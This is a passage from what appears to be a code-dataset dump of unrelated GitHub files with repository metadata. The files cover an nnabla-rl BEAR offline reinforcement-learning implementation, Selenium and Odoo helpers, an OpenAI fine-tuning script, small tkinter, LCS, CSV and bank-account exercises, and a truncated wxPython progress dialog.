Defaults to 20000\n use_mean_for_eval (bool): Use mean value instead of best action among the samples for evaluation.\\\n Defaults to False.\n \"\"\"\n gamma: float = 0.99\n learning_rate: float = 1e-3\n batch_size: int = 100\n tau: float = 0.005\n lmb: float = 0.75\n epsilon: float = 0.05\n num_q_ensembles: int = 2\n num_mmd_actions: int = 5\n num_action_samples: int = 10\n mmd_type: str = 'gaussian'\n mmd_sigma: float = 20.0\n initial_lagrange_multiplier: Optional[float] = None\n fix_lagrange_multiplier: bool = False\n warmup_iterations: int = 20000\n use_mean_for_eval: bool = False\n\n def __post_init__(self):\n \"\"\"__post_init__\n\n Check set values are in valid range.\n \"\"\"\n if not ((0.0 <= self.tau) & (self.tau <= 1.0)):\n raise ValueError('tau must lie between [0.0, 1.0]')\n if not ((0.0 <= self.gamma) & (self.gamma <= 1.0)):\n raise ValueError('gamma must lie between [0.0, 1.0]')\n if not (0 <= self.num_q_ensembles):\n raise ValueError('num q ensembles must not be negative')\n if not (0 <= self.num_mmd_actions):\n raise ValueError('num mmd actions must not be negative')\n if not (0 <= self.num_action_samples):\n raise ValueError('num action samples must not be negative')\n if not (0 <= self.warmup_iterations):\n raise ValueError('warmup iterations must not be negative')\n if not (0 <= self.batch_size):\n raise ValueError('batch size must not be negative')\n\n\nclass DefaultQFunctionBuilder(ModelBuilder[QFunction]):\n def build_model(self, # type: ignore[override]\n scope_name: str,\n env_info: EnvironmentInfo,\n algorithm_config: BEARConfig,\n **kwargs) -> QFunction:\n return TD3QFunction(scope_name)\n\n\nclass DefaultPolicyBuilder(ModelBuilder[StochasticPolicy]):\n def build_model(self, # type: ignore[override]\n scope_name: str,\n env_info: EnvironmentInfo,\n algorithm_config: BEARConfig,\n **kwargs) -> StochasticPolicy:\n return BEARPolicy(scope_name, env_info.action_dim)\n\n\nclass DefaultVAEBuilder(ModelBuilder[VariationalAutoEncoder]):\n def build_model(self, # type: ignore[override]\n scope_name: str,\n env_info: EnvironmentInfo,\n algorithm_config: BEARConfig,\n **kwargs) -> VariationalAutoEncoder:\n return UnsquashedVariationalAutoEncoder(scope_name,\n env_info.state_dim,\n env_info.action_dim,\n env_info.action_dim*2)\n\n\nclass DefaultSolverBuilder(SolverBuilder):\n def build_solver(self, # type: ignore[override]\n env_info: EnvironmentInfo,\n algorithm_config: BEARConfig,\n **kwargs) -> nn.solver.Solver:\n return NS.Adam(alpha=algorithm_config.learning_rate)\n\n\nclass BEAR(Algorithm):\n \"\"\"Bootstrapping Error Accumulation Reduction (BEAR) algorithm.\n\n This class implements the Bootstrapping Error Accumulation Reduction (BEAR) algorithm\n proposed by A. Kumar, et al. 
in the paper: \"Stabilizing Off-Policy Q-learning via Bootstrapping Error Reduction\"\n For details see: https://arxiv.org/abs/1906.00949\n\n This algorithm only supports offline training.\n\n Args:\n env_or_env_info \\\n (gym.Env or :py:class:`EnvironmentInfo `):\n the environment to train or environment info\n config (:py:class:`BEARConfig `):\n configuration of the BEAR algorithm\n q_function_builder (:py:class:`ModelBuilder[QFunction] `):\n builder of q-function models\n q_solver_builder (:py:class:`SolverBuilder `):\n builder for q-function solvers\n pi_function_builder (:py:class:`ModelBuilder[StochasticPolicy] `):\n builder of policy models\n pi_solver_builder (:py:class:`SolverBuilder `):\n builder for policy solvers\n vae_builder (:py:class:`ModelBuilder[VariationalAutoEncoder] `):\n builder of variational auto encoder models\n vae_solver_builder (:py:class:`SolverBuilder `):\n builder for variational auto encoder solvers\n lagrange_solver_builder (:py:class:`SolverBuilder `):\n builder for lagrange multiplier solver\n \"\"\"\n\n # type declarations to type check with mypy\n # NOTE: declared variables are instance variable and NOT class variable, unless it is marked with ClassVar\n # See https://mypy.readthedocs.io/en/stable/class_basics.html for details\n _config: BEARConfig\n _q_ensembles: List[QFunction]\n _q_solvers: Dict[str, nn.solver.Solver]\n _target_q_ensembles: List[QFunction]\n _pi: StochasticPolicy\n _pi_solver: nn.solver.Solver\n _target_pi: StochasticPolicy\n _vae: VariationalAutoEncoder\n _vae_solver: nn.solver.Solver\n _lagrange: MT.policy_trainers.bear_policy_trainer.AdjustableLagrangeMultiplier\n _lagrange_solver: nn.solver.Solver\n _q_function_trainer: ModelTrainer\n _encoder_trainer: ModelTrainer\n _policy_trainer: ModelTrainer\n _eval_state_var: nn.Variable\n _eval_action: nn.Variable\n _eval_max_index: nn.Variable\n\n _encoder_trainer_state: Dict[str, Any]\n _policy_trainer_state: Dict[str, Any]\n _q_function_trainer_state: Dict[str, Any]\n\n def __init__(self, env_or_env_info: Union[gym.Env, EnvironmentInfo],\n config: BEARConfig = BEARConfig(),\n q_function_builder: ModelBuilder[QFunction] = DefaultQFunctionBuilder(),\n q_solver_builder: SolverBuilder = DefaultSolverBuilder(),\n pi_builder: ModelBuilder[StochasticPolicy] = DefaultPolicyBuilder(),\n pi_solver_builder: SolverBuilder = DefaultSolverBuilder(),\n vae_builder: ModelBuilder[VariationalAutoEncoder] = DefaultVAEBuilder(),\n vae_solver_builder: SolverBuilder = DefaultSolverBuilder(),\n lagrange_solver_builder: SolverBuilder = DefaultSolverBuilder()):\n super(BEAR, self).__init__(env_or_env_info, config=config)\n\n with nn.context_scope(context.get_nnabla_context(self._config.gpu_id)):\n self._q_ensembles = []\n self._q_solvers = {}\n self._target_q_ensembles = []\n for i in range(self._config.num_q_ensembles):\n q = q_function_builder(scope_name=\"q{}\".format(\n i), env_info=self._env_info, algorithm_config=self._config)\n target_q = q_function_builder(\n scope_name=\"target_q{}\".format(i), env_info=self._env_info, algorithm_config=self._config)\n self._q_ensembles.append(q)\n self._q_solvers[q.scope_name] = q_solver_builder(env_info=self._env_info, algorithm_config=self._config)\n self._target_q_ensembles.append(target_q)\n\n self._pi = pi_builder(scope_name=\"pi\", env_info=self._env_info, algorithm_config=self._config)\n self._pi_solver = pi_solver_builder(env_info=self._env_info, algorithm_config=self._config)\n self._target_pi = pi_builder(scope_name=\"target_pi\", env_info=self._env_info, 
algorithm_config=self._config)\n\n self._vae = vae_builder(scope_name=\"vae\", env_info=self._env_info, algorithm_config=self._config)\n self._vae_solver = vae_solver_builder(env_info=self._env_info, algorithm_config=self._config)\n\n self._lagrange = MT.policy_trainers.bear_policy_trainer.AdjustableLagrangeMultiplier(\n scope_name=\"alpha\",\n initial_value=self._config.initial_lagrange_multiplier)\n self._lagrange_solver = lagrange_solver_builder(env_info=self._env_info, algorithm_config=self._config)\n\n @eval_api\n def compute_eval_action(self, state, *, begin_of_episode=False, extra_info={}):\n if has_batch_dimension(state, self._env_info):\n raise RuntimeError(f'{self.__name__} does not support batched state!')\n with nn.context_scope(context.get_nnabla_context(self._config.gpu_id)):\n state = add_batch_dimension(state)\n if not hasattr(self, '_eval_state_var'):\n self._eval_state_var = create_variable(1, self._env_info.state_shape)\n if self._config.use_mean_for_eval:\n eval_distribution = self._pi.pi(self._eval_state_var)\n self._eval_action = NF.tanh(eval_distribution.mean())\n else:\n repeat_num = 100\n if isinstance(self._eval_state_var, tuple):\n state_var = tuple(RF.repeat(x=s_var, repeats=repeat_num, axis=0)\n for s_var in self._eval_state_var)\n else:\n state_var = RF.repeat(x=self._eval_state_var, repeats=repeat_num, axis=0)\n assert state_var.shape == (repeat_num, self._eval_state_var.shape[1])\n\n eval_distribution = self._pi.pi(state_var)\n self._eval_action = NF.tanh(eval_distribution.sample())\n q_values = self._q_ensembles[0].q(state_var, self._eval_action)\n self._eval_max_index = RF.argmax(q_values, axis=0)\n\n set_data_to_variable(self._eval_state_var, state)\n if self._config.use_mean_for_eval:\n self._eval_action.forward()\n return np.squeeze(self._eval_action.d, axis=0)\n else:\n nn.forward_all([self._eval_action, self._eval_max_index])\n return self._eval_action.d[self._eval_max_index.d[0]]\n\n def _before_training_start(self, env_or_buffer):\n # set context globally to ensure that the training runs on configured gpu\n context.set_nnabla_context(self._config.gpu_id)\n self._encoder_trainer = self._setup_encoder_training(env_or_buffer)\n self._q_function_trainer = self._setup_q_function_training(env_or_buffer)\n self._policy_trainer = self._setup_policy_training(env_or_buffer)\n\n def _setup_encoder_training(self, env_or_buffer):\n trainer_config = MT.encoder_trainers.KLDVariationalAutoEncoderTrainerConfig()\n\n # Wrapper for squashing reconstructed action during vae training\n class SquashedActionVAE(VariationalAutoEncoder):\n def __init__(self, original_vae):\n super().__init__(original_vae.scope_name)\n self._original_vae = original_vae\n\n def encode_and_decode(self, s, **kwargs):\n latent_distribution, reconstructed = self._original_vae.encode_and_decode(s, **kwargs)\n return latent_distribution, NF.tanh(reconstructed)\n\n def encode(self, *args): raise NotImplementedError\n def decode(self, *args): raise NotImplementedError\n def decode_multiple(self, decode_num, *args): raise NotImplementedError\n def latent_distribution(self, *args): raise NotImplementedError\n\n squashed_action_vae = SquashedActionVAE(self._vae)\n encoder_trainer = MT.encoder_trainers.KLDVariationalAutoEncoderTrainer(\n models=squashed_action_vae,\n solvers={self._vae.scope_name: self._vae_solver},\n env_info=self._env_info,\n config=trainer_config)\n return encoder_trainer\n\n def _setup_q_function_training(self, env_or_buffer):\n # This is a wrapper class which outputs the target 
action for next state in q function training\n class PerturbedPolicy(DeterministicPolicy):\n def __init__(self, target_pi):\n super().__init__(target_pi.scope_name)\n self._target_pi = target_pi\n\n def pi(self, s):\n policy_distribution = self._target_pi.pi(s)\n return NF.tanh(policy_distribution.sample())\n target_policy = PerturbedPolicy(self._target_pi)\n\n trainer_config = MT.q_value.BCQQTrainerConfig(reduction_method='mean',\n num_action_samples=self._config.num_action_samples,\n lmb=self._config.lmb)\n q_function_trainer = MT.q_value.BCQQTrainer(\n train_functions=self._q_ensembles,\n solvers=self._q_solvers,\n target_functions=self._target_q_ensembles,\n target_policy=target_policy,\n env_info=self._env_info,\n config=trainer_config)\n for q, target_q in zip(self._q_ensembles, self._target_q_ensembles):\n sync_model(q, target_q, 1.0)\n return q_function_trainer\n\n def _setup_policy_training(self, env_or_buffer):\n trainer_config = MT.policy_trainers.BEARPolicyTrainerConfig(\n num_mmd_actions=self._config.num_mmd_actions,\n mmd_type=self._config.mmd_type,\n epsilon=self._config.epsilon,\n fix_lagrange_multiplier=self._config.fix_lagrange_multiplier,\n warmup_iterations=self._config.warmup_iterations-self._iteration_num)\n\n class SquashedActionQ(QFunction):\n def __init__(self, original_q):\n super().__init__(original_q.scope_name)\n self._original_q = original_q\n\n def q(self, s, a):\n squashed_action = NF.tanh(a)\n return self._original_q.q(s, squashed_action)\n\n wrapped_qs = [SquashedActionQ(q) for q in self._q_ensembles]\n policy_trainer = MT.policy_trainers.BEARPolicyTrainer(\n models=self._pi,\n solvers={self._pi.scope_name: self._pi_solver},\n q_ensembles=wrapped_qs,\n vae=self._vae,\n lagrange_multiplier=self._lagrange,\n lagrange_solver=self._lagrange_solver,\n env_info=self._env_info,\n config=trainer_config)\n sync_model(self._pi, self._target_pi, 1.0)\n\n return policy_trainer\n\n def _run_online_training_iteration(self, env):\n raise NotImplementedError\n\n def _run_offline_training_iteration(self, buffer):\n self._bear_training(buffer)\n\n def _bear_training(self, replay_buffer):\n experiences, info = replay_buffer.sample(self._config.batch_size)\n (s, a, r, non_terminal, s_next, *_) = marshal_experiences(experiences)\n batch = TrainingBatch(batch_size=self._config.batch_size,\n s_current=s,\n a_current=a,\n gamma=self._config.gamma,\n reward=r,\n non_terminal=non_terminal,\n s_next=s_next,\n weight=info['weights'])\n\n self._q_function_trainer_state = self._q_function_trainer.train(batch)\n for q, target_q in zip(self._q_ensembles, self._target_q_ensembles):\n sync_model(q, target_q, tau=self._config.tau)\n td_errors = self._q_function_trainer_state['td_errors']\n replay_buffer.update_priorities(td_errors)\n\n self._encoder_trainer_state = self._encoder_trainer.train(batch)\n self._policy_trainer_state = self._policy_trainer.train(batch)\n sync_model(self._pi, self._target_pi, tau=self._config.tau)\n\n def _models(self):\n models = [*self._q_ensembles, *self._target_q_ensembles,\n self._pi, self._target_pi, self._vae,\n self._lagrange]\n return {model.scope_name: model for model in models}\n\n def _solvers(self):\n solvers = {}\n solvers.update(self._q_solvers)\n solvers[self._pi.scope_name] = self._pi_solver\n solvers[self._vae.scope_name] = self._vae_solver\n if not self._config.fix_lagrange_multiplier:\n solvers[self._lagrange.scope_name] = self._lagrange_solver\n return solvers\n\n @classmethod\n def is_supported_env(cls, env_or_env_info):\n env_info = 
EnvironmentInfo.from_env(env_or_env_info) if isinstance(env_or_env_info, gym.Env) \\\n else env_or_env_info\n return not env_info.is_discrete_action_env() and not env_info.is_tuple_action_env()\n\n @property\n def latest_iteration_state(self):\n latest_iteration_state = super(BEAR, self).latest_iteration_state\n if hasattr(self, '_encoder_trainer_state'):\n latest_iteration_state['scalar'].update(\n {'encoder_loss': float(self._encoder_trainer_state['encoder_loss'])})\n if hasattr(self, '_policy_trainer_state'):\n latest_iteration_state['scalar'].update({'pi_loss': float(self._policy_trainer_state['pi_loss'])})\n if hasattr(self, '_q_function_trainer_state'):\n latest_iteration_state['scalar'].update({'q_loss': float(self._q_function_trainer_state['q_loss'])})\n latest_iteration_state['histogram'].update({'td_errors': self._q_function_trainer_state['td_errors']})\n return latest_iteration_state\n\n @property\n def trainers(self):\n return {\n \"encoder\": self._encoder_trainer,\n \"q_function\": self._q_function_trainer,\n \"policy\": self._policy_trainer,\n }\n","repo_name":"sony/nnabla-rl","sub_path":"nnabla_rl/algorithms/bear.py","file_name":"bear.py","file_ext":"py","file_size_in_byte":20525,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"75"} +{"seq_id":"40371182926","text":"import json\nimport os\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support.ui import Select\nfrom selenium import webdriver\nfrom time import sleep\n\ndef jq(el):\n return seleniumXpathEngine.driver.execute_script(el)\n\nclass OperationJson:\n def __init__(self,file_name=None):\n if file_name:\n self.file_name = file_name\n else:\n self.file_name = './package.json'\n self.data = self.get_data()\n\n def get_data(self):\n fp = open(self.file_name)\n data = json.load(fp)\n fp.close()\n return data\n\n def get_value(self,id):\n return self.data[id]\n\ndef getTag():\n return \"feature/v\"+OperationJson(os.path.join(os.getcwd() + \"/package.json\")).get_value('version')\n\n\nclass SeleniumXpathEngine:\n def __init__(self,url):\n self.driver = webdriver.Chrome()\n self.driver.get(url)\n\n\n def setJquery(self):\n if self.driver.execute_script('return typeof(jQuery) === \"undefined\"'):\n jQuerify = open(os.path.join(os.getcwd() + '/bin/jquery-1.7.2.min.js'), \"r+\").read()\n self.driver.execute_script(jQuerify)\n sleep(1)\n\n def xPathClick(self,xPath,info=\"\"):\n try:\n return self.driver.find_element_by_xpath(xPath).click()\n except:\n print(info + \"--点击未触发\")\n\n def text(self,select,text,info=\"\"):\n try:\n self.setJquery()\n self.driver.execute_script('$(\"'+select+'\")[0].focus()')\n sleep(2)\n self.driver.execute_script('$(\"'+select+'\").val(\"'+ text +'\")')\n sleep(2)\n self.driver.execute_script('$(\"'+select+'\")[0].dispatchEvent(new Event(\"input\"))')\n except:\n print(info + \"--写入未触发\")\n def xPathSelect(self,xPath,text,info=\"\"):\n try:\n selectTag = Select(self.driver.find_element_by_xpath(xPath))\n selectTag.select_by_value(text)\n except:\n print(info + \"--未触发\")\n def window(self,no,info=\"\"):\n try:\n self.driver.switch_to.window(self.driver.window_handles[no])\n except:\n print(info + \"--未触发切换第\"+no+\"窗口\")\n def scroll(self,dom,height,info=\"\"):\n try:\n self.setJquery()\n sleep(2)\n self.driver.execute_script(\"$('\"+dom+\"').scrollTop(\"+height+\")\")\n except:\n print(info + 
\"--未触发\")\n\n\n","repo_name":"aiyuekuang/umiTemplate","sub_path":"bin/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73029823921","text":"from odoo import fields, models, api\n\n\nclass SurveyQuestion(models.Model):\n\n _inherit = 'survey.question'\n\n max_score = fields.Integer(\n compute='_compute_max_score',\n string='Max Score',\n help='Max score an answer of this question can get',\n store=True,\n )\n\n objective_id = fields.Many2one(\n 'survey.question.objective',\n string='Objective',\n )\n level_id = fields.Many2one(\n 'survey.question.level',\n string='Level',\n )\n content_id = fields.Many2one(\n 'survey.question.content',\n string='Content',\n )\n\n score_calc_method = fields.Selection(\n [('direct_sum', 'Direct Sum'),\n ('ranges', 'Ranges')],\n string='Score Method',\n help=\"Choose\"\n \"-Direct Sum if you want to sum the values \"\n \" assigned to questions answers.\"\n \"-Ranges if you want to define ranges for correct answers.\",\n default='direct_sum',)\n score_ranges_ids = fields.One2many(\n 'survey.question.score.range',\n 'survey_question_id',\n string='Ranges',\n )\n copy_labels_ids = fields.One2many(\n 'survey.label',\n related='labels_ids',\n string='Suggested answers',\n readonly=False,\n )\n is_evaluation = fields.Boolean(\n related='survey_id.is_evaluation',\n )\n\n @api.depends(\n 'score_ranges_ids',\n 'score_ranges_ids.score',\n 'score_calc_method',\n 'copy_labels_ids',\n 'copy_labels_ids.score',\n 'matrix_subtype',\n 'labels_ids_2',\n 'labels_ids_2.matrix_answer_score_ids',\n 'labels_ids_2.matrix_answer_score_ids.score',\n 'type',)\n def _compute_max_score(self):\n # TODO mejorar esto y ver porque se llama\n # varias veces a esta funcion *hay que cambiarlo tambien\n # en academic_reports que sobreescribimos esta funcion\n max_score = 0\n for question in self:\n if question.type == 'simple_choice':\n scores = [answer.score for answer in question.copy_labels_ids]\n max_score = max(scores if scores else [0])\n\n elif question.type == 'multiple_choice' and\\\n question.score_calc_method == 'direct_sum':\n max_score = sum(\n [answer.score for answer in question.copy_labels_ids\n if answer.score > 0])\n elif question.type == 'multiple_choice' and\\\n question.score_calc_method == 'ranges':\n scores = [score_range.score\n for score_range in question.score_ranges_ids]\n max_score = max(scores if scores else [0])\n\n elif question.type == 'numerical_box' and\\\n question.score_calc_method == 'direct_sum':\n max_score = question.validation_max_float_value\n elif question.type == 'numerical_box' and\\\n question.score_calc_method == 'ranges':\n scores = [score_range.score\n for score_range in question.score_ranges_ids]\n max_score = max(scores if scores else [0])\n\n elif question.type == 'matrix' and\\\n question.matrix_subtype == 'simple' and \\\n question.score_calc_method == 'direct_sum':\n for matrix_question in question.labels_ids_2:\n scores = [\n matrix_score.score\n for matrix_score in\n matrix_question.matrix_answer_score_ids]\n max_score += max(scores if scores else [0])\n elif question.type == 'matrix' and \\\n question.matrix_subtype == 'multiple' and \\\n question.score_calc_method == 'direct_sum':\n for matrix_question in question.labels_ids_2:\n max_score += sum(\n [matrix_score.score\n for matrix_score in\n matrix_question.matrix_answer_score_ids\n if matrix_score.score > 0])\n elif question.type == 'matrix' and \\\n 
question.score_calc_method == 'ranges':\n scores = [score_range.score\n for score_range in question.score_ranges_ids]\n max_score = max(scores if scores else [0])\n question.max_score = max_score\n","repo_name":"ingadhoc/survey","sub_path":"evaluation/models/survey_question.py","file_name":"survey_question.py","file_ext":"py","file_size_in_byte":4468,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"15397640029","text":"import openai\nimport os\nfrom dotenv import load_dotenv\n\ndef main():\n\tload_dotenv()\n\tprint (\"Starting Training...\")\n\tscript_directory = os.path.dirname(os.path.abspath(__file__))\n\trelative_training = \"training_data.jsonl\" \n\n\ttraining_path = os.path.join(script_directory, relative_training)\n\n\topenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\ttraining_response = openai.File.create(\n\t file=open(training_path, \"rb\"),\n\t purpose='fine-tune'\n\t)\n\n\ttraining_file_id = training_response[\"id\"]\n\n\tresponse = openai.FineTuningJob.create(\n\t\t\ttraining_file=training_file_id,\n\t\t\tmodel=\"gpt-3.5-turbo\",\n\t\t\tsuffix=\"lwfm_assistant\"\n\t)\n\n\tjob_id = response[\"id\"]\n\n\tprint(response)\n\n\tresponse = openai.FineTuningJob.list_events(id=job_id, limit=50)\n\n\tevents = response[\"data\"]\n\tevents.reverse()\n\n\tfor event in events:\n\t\tprint(\"EVENT MESSAGE: \" + event[\"message\"])\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"gr80mcbr/doc-reader","sub_path":"fine_tuner.py","file_name":"fine_tuner.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5705273983","text":"from tkinter import *\nfrom random import *\nimport time\n\n\nclass model(Frame):\n def __init__(self, q):\n super().__init__()\n self.get_graphics(q)\n\n\n def get_graphics(self, q):\n\n self.master.title(\"Plane\")\n self.pack(fill=BOTH, expand=1)\n canvas = Canvas(self, width=1450, height=310, bg=\"gray80\")\n\n x_help = 15\n y_help = 15\n for x in range(0, len(q)):\n for y in range(0, 7):\n if q[x][y] == \"0\":\n canvas.create_rectangle(\n x_help + x * 42, y_help + y * 42, x_help + x * 42 + 35, y_help + y * 42 + 35,\n outline=\"gray0\", fill=\"salmon\")\n\n elif q[x][y] == \"1\":\n canvas.create_rectangle(\n x_help + x * 42, y_help + y * 42, x_help + x * 42 + 35, y_help + y * 42 + 35,\n outline=\"gray0\", fill=\"cyan4\")\n\n elif q[x][y] == \"2\":\n canvas.create_rectangle(\n x_help + x * 42, y_help + y * 42, x_help + x * 42 + 35, y_help + y * 42 + 35,\n outline=\"gray0\", fill=\"gray52\")\n\n else:\n if y == 3:\n canvas.create_rectangle(\n x_help + x * 42, y_help + y * 42, x_help + x * 42 + 35, y_help + y * 42 + 35,\n outline=\"gray80\", fill=\"gray80\")\n\n else:\n canvas.create_rectangle(\n x_help + x * 42, y_help + y * 42, x_help + x * 42 + 35, y_help + y * 42 + 35,\n outline=\"gray0\", fill=\"azure\")\n\n canvas.pack(fill=BOTH, expand=1)\n\n\nroot = Tk()\nroot.geometry(\"1450x350\" + \"+\" + str(10) + \"+\" + str(50))\nroot.title(\"Plane\")\nroot.configure(bg='Snow')\nroot.resizable(width=False, height=False)\n\n\nf = open(\"data/simple_model_out/out_of_iteration_0.csv\", \"r\").readlines()\nfor i in range(0, len(f)):\n q = []\n for j in range(0, 34):\n w = []\n for k in range(0, 7):\n w.append(f[i][7 * j + k])\n q.append(w)\n print(q)\n win_1 = model(q).place(x = 0, y = 10)\n root.update()\n 
time.sleep(0.001)\n\nroot.mainloop()\n","repo_name":"bubashilda/IMMC","sub_path":"models/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"22697154012","text":"\n\nTable = {}\ndef LCS_S(x,y,i,j):\n\t'''\n\tCalculates the length of the longest common subsequence of x[:i+1] and y[:j+1]\n\t'''\n\t\n\tif (i,j) not in Table:\n\t\tif i < 0 or j < 0 :\n\t\t\tTable[i,j] = 0\n\n\t\telif x[i] == y[j]:\n\t\t\tTable[i,j] = LCS_S(x,y,i-1,j-1) + 1\n\t\t\t\t\n\t\telse:\n\t\t\ts1 = LCS_S(x,y,i,j-1)\n\t\t\ts2 = LCS_S(x,y,i-1,j)\n\t\t\tTable[i,j] = max(s1,s2)\n\n\treturn Table[i,j]\n\n\n\n\nx = 'thecatruns'\ny = 'acatran'\nt = LCS_S(x,y,len(x)-1,len(y)-1)\nprint(t)\n\nimport util\nfor i in range(10):\n\tTable = {}\n\tx = util.random_str(100)\n\ty = util.random_str(100)\n\tt = LCS_S(x,y,len(x)-1,len(y)-1)\n\tprint(\"length:\",t)\n\n\n","repo_name":"milu-buet/ALGO-HW-6","sub_path":"Q5.py","file_name":"Q5.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"43321747092","text":"import csv\nimport pandas as pd\n\nwith open(\"al_results_2020 (1).csv\", newline='') as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=',')\n#need to chnage to dataframe\n exclude = ('Absent', '-', ' ', '')\n\n iter_csv = iter(csv_reader)\n for row in iter_csv:\n for row in csv_reader:\n if any(val in exclude for val in row):\n continue\n else:\n\n print(row)\n\nrow.to_csv('results.csv')\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"adenikea1/etl","sub_path":"al_results_code.py","file_name":"al_results_code.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19756728543","text":"class BankAccount:\r\n \r\n def __init__(self, idaccount_number, account_holder, initial_balance):\r\n if initial_balance < 500.00 :\r\n print(\"kont inisyal ou dwe depase 500 goud\")\r\n\r\n self.idaccount_number = idaccount_number\r\n self.account_holder = account_holder\r\n self.initial_balance = initial_balance\r\n\r\n def deposit(self,amount):\r\n self.initial_balance = self.initial_balance + amount\r\n \r\n\r\n def withdraw(self,amount):\r\n self.initial_balance = self.initial_balance - amount\r\n \r\n def get_balance(self):\r\n return self.initial_balance\r\n\r\n def __str__ (self):\r\n return \"Account number : {} \\n Account Holder : {}\\n balance : {} HTG\".format(self.idaccount_number,self.account_holder,self.initial_balance)\r\n\r\naccount1 = BankAccount(\"123456\",\"king bob\",10000)\r\naccount1.deposit(500.00)\r\naccount1.withdraw(200.00)\r\nbalance = account1.get_balance()\r\nprint(\"\\t\\t-----Account 1 :------\\n\",account1)\r\n\r\naccount2 = BankAccount(\"678942\",\"king Ragnar\",23000)\r\naccount2.deposit(13000)\r\naccount2.withdraw(2000)\r\nbalance = account2.get_balance()\r\nprint(\"\\t\\t-----Account 2 :------\\n\",account2)\r\n\r\naccount3 = BankAccount(\"652891\",\"Ivar the Bornless\",18000)\r\naccount3.deposit(14000)\r\naccount3.withdraw(5000)\r\nbalance = account3.get_balance()\r\nprint(\"\\t\\t-----Account 3 :------\\n\",account3)\r\n\r\naccount4 = BankAccount(\"652844\",\"Bjorn Cote de fer\",19000)\r\naccount4.deposit(14000)\r\naccount4.withdraw(5000)\r\nbalance = account4.get_balance()\r\nprint(\"\\t\\t-----Account 4 :------\\n\",account4)\r\n\r\n\r\n \r\n \r\n 
\r\n\r\n","repo_name":"RagnarBob/makendyalexis","sub_path":"Enonceklass.py","file_name":"Enonceklass.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"43081164247","text":"import wx\nfrom IQDMPDF.file_processor import process_files\nfrom threading import Thread\nfrom pubsub import pub\nfrom os.path import isdir\nfrom iqdma.utilities import set_icon\n\n\nclass ProgressFrame(wx.Dialog):\n \"\"\"Create a window to display progress and begin provided worker\"\"\"\n\n def __init__(self, parent, options):\n wx.Dialog.__init__(self, None)\n self.parent = parent\n set_icon(self)\n\n self.text_ctrl = {\n \"scan\": wx.TextCtrl(self, wx.ID_ANY, \"\"),\n \"output\": wx.TextCtrl(self, wx.ID_ANY, \"\"),\n }\n\n self.button = {\n \"scan\": wx.Button(self, wx.ID_ANY, \"Browse\"),\n \"output\": wx.Button(self, wx.ID_ANY, \"Browse\"),\n \"exec\": wx.Button(self, wx.ID_ANY, \"Start\"),\n }\n self.button[\"exec\"].Disable()\n\n self.iqdm_pdf_kwargs = {\n \"ignore_extension\": options.PDF_IGNORE_EXT,\n \"processes\": options.PDF_N_JOBS,\n }\n\n self.gauge = wx.Gauge(self, wx.ID_ANY, 100)\n # self.gauge.Hide()\n self.label_progress = wx.StaticText(self, wx.ID_ANY, \"\")\n self.label_elapsed = wx.StaticText(self, wx.ID_ANY, \"\")\n self.label_remaining = wx.StaticText(self, wx.ID_ANY, \"\")\n\n self.__set_properties()\n self.__do_bind()\n self.__do_layout()\n self.__do_subscribe()\n\n self.Show()\n\n def __do_subscribe(self):\n pub.subscribe(self.update, \"progress_update\")\n\n def run(self):\n \"\"\"Initiate layout in GUI and begin thread\"\"\"\n # self.gauge.Show()\n self.button[\"exec\"].Disable()\n self.iqdm_pdf_kwargs[\"init_directory\"] = self.text_ctrl[\n \"scan\"\n ].GetValue()\n self.iqdm_pdf_kwargs[\"output_dir\"] = self.text_ctrl[\n \"output\"\n ].GetValue()\n\n for key in self.text_ctrl.keys():\n self.text_ctrl[key].Disable()\n self.button[key].Disable()\n\n self.label_progress.SetLabelText(\"Reading directory tree...\")\n self.Layout()\n ProgressFrameWorker(self.iqdm_pdf_kwargs)\n\n def callback(self, msg):\n wx.CallAfter(self.gauge.SetValue, int(msg.split(\"%|\")[0]))\n\n def __set_properties(self):\n self.SetMinSize((672, 100))\n self.SetTitle(\"IQDM-PDF\")\n\n def __do_bind(self):\n self.Bind(wx.EVT_CLOSE, self.close)\n self.Bind(\n wx.EVT_BUTTON, self.on_browse_scan, id=self.button[\"scan\"].GetId()\n )\n self.Bind(\n wx.EVT_BUTTON,\n self.on_browse_output,\n id=self.button[\"output\"].GetId(),\n )\n self.Bind(\n wx.EVT_TEXT, self.enable_start, id=self.text_ctrl[\"scan\"].GetId()\n )\n self.Bind(\n wx.EVT_TEXT, self.enable_start, id=self.text_ctrl[\"output\"].GetId()\n )\n self.Bind(\n wx.EVT_BUTTON, self.on_button_exec, id=self.button[\"exec\"].GetId()\n )\n\n def __do_layout(self):\n\n sizer = {\n \"wrapper\": wx.BoxSizer(wx.VERTICAL),\n \"time\": wx.BoxSizer(wx.HORIZONTAL),\n \"exec\": wx.BoxSizer(wx.HORIZONTAL),\n }\n static_box_sizers = {\n \"scan\": (\"Scanning Directory\", wx.HORIZONTAL),\n \"output\": (\"Output Directory\", wx.HORIZONTAL),\n }\n for key, box in static_box_sizers.items():\n sizer[key] = wx.StaticBoxSizer(\n wx.StaticBox(self, wx.ID_ANY, box[0]), box[1]\n )\n\n for key, text_ctrl in self.text_ctrl.items():\n sizer[key].Add(self.text_ctrl[key], 1, wx.EXPAND | wx.ALL, 5)\n sizer[key].Add(self.button[key], 